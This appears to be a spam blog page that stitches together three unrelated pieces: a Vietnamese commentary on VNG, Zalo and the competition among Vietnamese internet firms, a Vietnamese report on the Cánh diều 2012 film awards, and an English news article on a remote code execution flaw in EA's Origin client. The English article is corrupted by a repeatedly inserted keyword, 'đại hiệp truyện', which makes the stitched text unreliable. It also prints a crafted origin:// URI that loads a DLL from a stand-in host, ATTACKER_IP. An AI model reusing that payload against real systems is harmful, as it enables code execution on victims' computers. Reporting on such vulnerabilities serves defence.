Có lẽ việc phát triển Zing Me nằm trong chiến lược này của VNG. Nếu Zing Me thành công (về cả mặt số lượng users và thói quen sản xuất content), thì công nghệ data mining của ePi có thể được apply vô để hoàn thiện ông cụ tổng hợp thông tin từ mạng xã hội. Nhưng thật tiếc, Zing Me có thể được số lượng người dùng khủng nhưng không tạo ra được những nội dung  "có chất" như tập hợp người dùng Facebook. Nên có thể coi như đó là một bước đi thất bại.

Nhưng VNG vẫn có cơ hội cực lớn với Zalo. Trên mặt trận mobile, VNG hoàn toàn có thể biến Zalo trở thành một mạng xã hội, nơi người sử dụng có thói quen chia sẻ thông tin như họ đã làm với tính năng "khoảnh khắc" trong Wechat. Nếu thắng trong cuộc chiến này, Zalo có thể trở thành một nguồn cung cấp thông tin không thua gì facebook. Và khi ấy VNG có thể dùng công nghệ của ePi "chọc" vào Zalo để hoàn thiện công cụ cuối cùng.

Đến lúc ấy, Zini sẽ trở thành Weibo của Việt Nam. Nếu Zini thành Weibo của Việt Nam thì Facebook rất có thể sẽ đi vào dĩ vãng (chưa kể tới việc facebook có thể được vận động để chặn vì lý do kinh tế hay chính trị).

Nhìn theo hướng này, kể cả VTC, VCCorp hay FPT rõ ràng đều "không có cửa". Cả 3 công ty lớn này đều chưa sở hữu trong tay một nền tảng ứng dụng mobile nào khả dĩ đủ lớn để có thể biến thành một mạng xã hội mobile.

VCCorp có một hệ sinh thái khá đa dạng và trù phú, có thể giải quyết bài toán phát triển công cụ tổng hợp tin tức từ báo chí khá tốt nhưng chắc còn lâu mới địch lại được công nghệ mà baomoi đã nghiên cứu và vận hành từ đó đến nay. Dù rằng VCCorp vẫn còn "tàn dư" của công cụ search bamboo cũng có thể xử lý data mining từ các nguồn báo chí giai đoạn trước.FPT có VnExpress là "tờ báo tiếng Việt đông người đọc nhất" nhưng nếu chỉ một mình VnExpress thôi thì không đủ. Mạng xã hội banbe đã tự động rút lui trong cuộc chiến với Go, với Zing Me và Facebook. Hàng loạt sản phẩm mobile thời hậu Visky như Vihuni, Vtalk, Violet... cũng đã trở nên vô tác dụng chỉ vì một lý do chọn sai điểm rơi, ra đời quá sớm, đi trước thời đại quá lâu nên đến bây giờ FPT hoàn toàn trắng tay trong trận chiến mobile.

FPT chỉ còn duy nhất một cách để tham chiến là tìm sản phẩm thật ngon để vung tiền ra mua lại. Nhưng ở Việt Nam, ngoài Zalo, KakaoTalk và Line ra thì làm gì còn sản phẩm nào tốt nữa? Tapmee thì Không được; Timbox cũng không có cửa. Chỉ có duy nhất một sản phẩm có cơ may bứt phá là WALA.

Cuối năm 2012, một nhân vật cấp cao của FPT đã có ý định mua WALA nhưng thất bại vì sản phẩm này đang được đầu tư của nhiều tên tuổi lớn trong làng Internet. Có thể tạm coi ở cuộc chiến mobile, FPT không còn bất cứ đường nào để nhảy vào tham chiến (ngoại trừ mua một sản phẩm hiện có của nước ngoài).

Tuy nhiên, với tình hình chiến sự hiện thời, bản thân WALA cũng sẽ chết dù làm bất cứ việc gì nếu không nhanh chóng kết hợp với một bên nào đó sở hữu hệ sinh thái tin tức cực kỳ đa dạng. Xét về hình thái và phân mục thông tin, người viết nghĩ WALA nên kết hợp với VCCorp, nguồn thông tin đa dạng từ kenh14, soha, linkhay, afamily, cafebiz, autopro, socnhi, dantri, nguoilaodong... đủ tạo thành một nguồn thông tin đủ mạnh khả dĩ địch lại baomoi.com.

Nếu WALA kết hợp được với VCCorp thì cơ hội để trở thành Weibo cho sản phẩm non trẻ này cũng khá thênh thang, WALA + VCCorp = Zini (Zalo + ePi baomoi). Bài toán khi này chỉ còn quy về việc đơn vị nào có thể nhanh chóng phát triển một cộng đồng sản xuất nội dung chất lượng?

VNG vừa phê duyệt cho Zalo một ngân sách khủng để mời gọi nhiều influencer trên facebook tham gia sử dụng Zalo. Việc này ngoài vấn đề về quảng cáo (theo người viết là không quan trọng) thì vấn đề tạo ra một cộng đồng có thói quen sản xuất nội dung mới là lợi thế của Zalo. Người viết nghĩ VNG cũng nên cân nhắc mua lại một cộng đồng hiện có rất phù hợp với định hướng này là beat.vn

Tóm lại, bây giờ con át chủ bài của VNG chính là Zalo. Và VNG phải làm mọi cách, đổ công, đổ sức, đổ tiền, đổ của vào để biến Zalo trở thành một mạng xã hội tương tự như facebook, với hàng triệu người dùng (sắp đạt được) có khả năng sản xuất nội dung (khó vô cùng tận). Khi họ làm được điều này, các đối thủ như KakaoTalk hay LINE sẽ tự thua (Wechat thì bị tẩy chay rồi nên người viết không nói).
Với tất cả thông tin như trênngười viết cho rằng VNG chính là công ty Internet số 1 Việt Nam.
Nguyễn Ngọc Long

Game thống lĩnh - Bảo đao đồ long - thống lĩnh thiên hạ

Thứ Hai, 18 tháng 3, 2013

Thiên mệnh anh hùng thắng thuyết phục


Đại hiệp truyện

Thiên mệnh anh hùng thắng thuyết phục

Chiến thắng của Thiên mệnh anh hùng ở hạng mục phim truyện điện ảnh đã làm thỏa mãn giới chuyên môn lẫn đông đảo khán giả.



Đêm trao giải Cánh diều 2012 diễn ra vào tối qua 9.3 tại Nhà hát Truyền hình TP.HCM không vướng nhiều “sạn” như những năm trước, đúng nghĩa “một đêm hội ấm áp cho những người trong nghề” như đạo diễn Quyền Linh chia sẻ. Đông đảo khán giả và người làm nghề đã tỏ ra hài lòng khi đêm trao giải có nhiều tiết mục thú vị (như hoạt cảnh đoàn làm phim nhí), trang trọng tôn vinh 2 NSND Huy Thành và NSND Trương Qua.

NSND, đạo diễn Đặng Nhật Minh - thành viên Ban giám khảo phim truyện nhựa, đã chia sẻ ngắn gọn với PV Thanh Niên ngay sau công bố Cánh diều vàng dành cho Thiên mệnh anh hùng: “Bộ phim đã đạt được sự đồng thuận cao của tất cả các thành viên giám khảo, không có một ý kiến phản bác nào bởi trong mặt bằng chung các phim dự giải năm nay, Thiên mệnh anh hùng đạt được chất lượng tốt nhất về mọi khâu: thể loại mới thành công, thủ pháp đạo diễn có nghề, bố cục phim mạch lạc tạo ra được sự hấp dẫn, hình ảnh hoành tráng, võ thuật gây hút mắt, diễn xuất của diễn viên đồng bộ…”.

Thiên mệnh anh hùng ngay từ khi ra mắt năm ngoái, vào dịp Tết 2012, đã được công chúng, báo giới đánh giá cao, được xem là tác  phẩm có những dấu ấn mở đường cho thể loại phim kiếm hiệp, lịch sử của điện ảnh Việt, đã “dũng cảm khai thông bế tắc lâu nay của dòng phim lịch sử - dã sử Việt Nam”. Bên cạnh sự thành công về chuyên môn, Thiên mệnh anh hùng cũng mang tính giải trí cao và đã thành công  trong việc thu hút khán giả, đồng thời đánh dấu sự hiện đại, đột phá hơn của phim Việt về công nghệ, kỹ xảo.
 
Một số giải khác

Phim truyện nhựa: Quay phim xuất sắc phim truyện nhựa: Nguyễn K’Linh (phim Thiên mệnh anh hùng); Họa sĩ thiết kế xuất sắc: Phạm Quang Vĩnh (phim Mùa hè lạnh); Âm thanh xuất sắc: Trần Đức Quang - Trần Anh Khoa (phim Thiên mệnh anh hùng); Âm nhạc: nhạc sĩ Lương Minh (phim Lạc lối). Nam nữ diễn viên phụ: Hứa Vỹ Văn (phim Đam mê) và Maya trong Scandal.

Với sự nổi trội trong “bó đũa phim dự giải” của Thiên mệnh anh hùng và Scandal (đoạt được giải Báo chí - Phê bình điện ảnh cho phim truyện điện ảnh xuất sắc nhất năm 2012 trong khuôn khổ giải Cánh diều 2012), đạo diễn Việt kiều Mỹ 38 tuổi Victor Vũ giành giải Đạo diễn xuất sắc nhất hạng mục phim truyện nhựa hoàn toàn xứng đáng. 5 năm về nước, Victor Vũ đã làm 5 phim, phim sau chất lượng cao hơn phim trước.

Phim Lạc lối chưa chiếu cho khán giả, giám khảo thì xem phim qua DVD chất lượng kỹ thuật thấp vì chưa in tráng ra phim nhựa kịp đã đoạt giải Cánh diều bạc. Một bất ngờ ở hạng mục Nam nữ diễn viên chính xuất sắc phim truyện nhựa, khi Thái Hòa dù rất xuất sắc với vai gã bán vé số “biến thái” trong Lấy chồng người ta đã để vuột giải về tay Huỳnh Đông trong Thiên mệnh anh hùng.

Ở lĩnh vực phim truyền hình, gây bất ngờ nhất là bộ phim lịch sử 34 tập Thái sư Trần Thủ Độ. Phim làm nhân dịp mừng 1.000 năm đại lễ Thăng Long, tốn không biết bao nhiêu tiền của, công sức (56 tỉ đồng) nhưng đến nay vẫn chưa được lên sóng, đã giành được nhiều giải thưởng lớn như giải Vàng phim hay nhất, Đạo diễn xuất sắc nhất cho Đào Duy Phúc, Biên kịch xuất sắc: nhà văn Nguyễn Mạnh Tuấn. Đạo diễn Đặng Tất Bình - Hãng phim truyện 1 khi nhận giải chỉ “mong muốn các đài sớm có lịch cho phim lên sóng chiếu cho khán giả; và mong rằng phim truyền hình sẽ chú trọng đến dòng phim lịch sử”. Hạng mục Nam - nữ diễn viên chính phim truyền hình được trao cho diễn viên Quý Bình và Huệ Minh.


Đại Hiệp Truyện
Thiên Cổ Đại Hiệp Mộng - Thần Điêu Hiệp Lữ Tình


Bug in EA’s Origin game đại hiệp truyện platform allows attackers to hijack player PCs

Bug in EA’s Origin game đại hiệp truyện platform allows attackers to hijack player PCs

More than 40 million people could be affected by a vulnerability researchers uncovered in EA's Origin online game đại hiệp truyện platform allowing attackers to remotely execute malicious code on players' computers.

The attack, demonstrated on Friday at the Black Hat security conference in Amsterdam, takes just seconds to execute. In some cases, it requires no interaction by victims, researchers from Malta-based ReVuln (@revuln) told Ars. It works by manipulating the uniform resource identifiers EA's site uses to automatically start game đại hiệp truyệns on an end user's machine. By exploiting flaws in the Origin application available for both Macs and PCs, the technique turns EA's popular game đại hiệp truyện store into an attack platform that can covertly install malware on customers' computers.

"The Origin platform allows malicious users to exploit local vulnerabilities or features by abusing the Origin URI handling mechanism," ReVuln researchers Donato Ferrante and Luigi Auriemma wrote in apaper accompanying last week's demonstration. "In other words, an attacker can craft a malicious Internet link to execute malicious code remotely on [a] victim's system, which has Origin installed."

The researchers' demo shows them taking control of a computer that has the Origin client and Crysis 3 game đại hiệp truyện installed. Behind the scenes, the EA platform uses the origin://Launchgame đại hiệp truyện/71503 link to activate the game đại hiệp truyện. When a targeted user instead clicks on a URI such as origin://Launchgame đại hiệp truyện/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll, the Origin client will load a Windows dynamic link library file of the attackers' choosing on the victim's computer.

Update: "Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure," an EA spokesman wrote in an e-mail to Ars.

The attack is similar to an exploit the same researchers demonstrated in October on Steam, a competing online game đại hiệp truyện platform from Valve, with 50 million users. The earlier attack relied on booby-trapped URLs starting with "Steam://" to trick browsers, game đại hiệp truyệns, e-mail clients, and other applications into executing code that could compromise the security of the underlying computer. At the time, the researchers advised vulnerable end users to protect themselves against exploits by disabling the automatic launching of Steam:// URLs.

The Origin attack works much the same. It exploits the functionality that allows sites to start game đại hiệp truyệns remotely. By modifying the variables in the underlying URI links, the commands to start a game đại hiệp truyện can be replaced with instructions that cause a computer to install a malicious program instead. One such command, which was included in the demo, is related to the OpenAutomate standard used in software provided with graphics cards from Nvidia. The technique works against people who have installedCrysis 3 and a variety of other game đại hiệp truyệns. Other techniques work against machines with different titles installed.

When an origin:// link is opened for the first time, browsers will typically ask if a user wants it to open in the Origin client, which is the registered application for such URLs. Different browsers handle these links differently, with some displaying full paths, others showing only parts of them, and still others not displaying the URL at all. Some confirmation prompts give users the option of using the Origin client to open all origin:// links encountered in the future. Many game đại hiệp truyệnrs choose this setting so they aren't prompted in the future. Those users who have selected this setting may not be required to take any interaction to be attacked. Users who want to protect themselves should make sure they are prompted before Origin links are processed.
Đại Hiệp Truyện - Thiên Cổ Đại Hiệp Mộng - Thần Điêu Hiệp Lữ Tình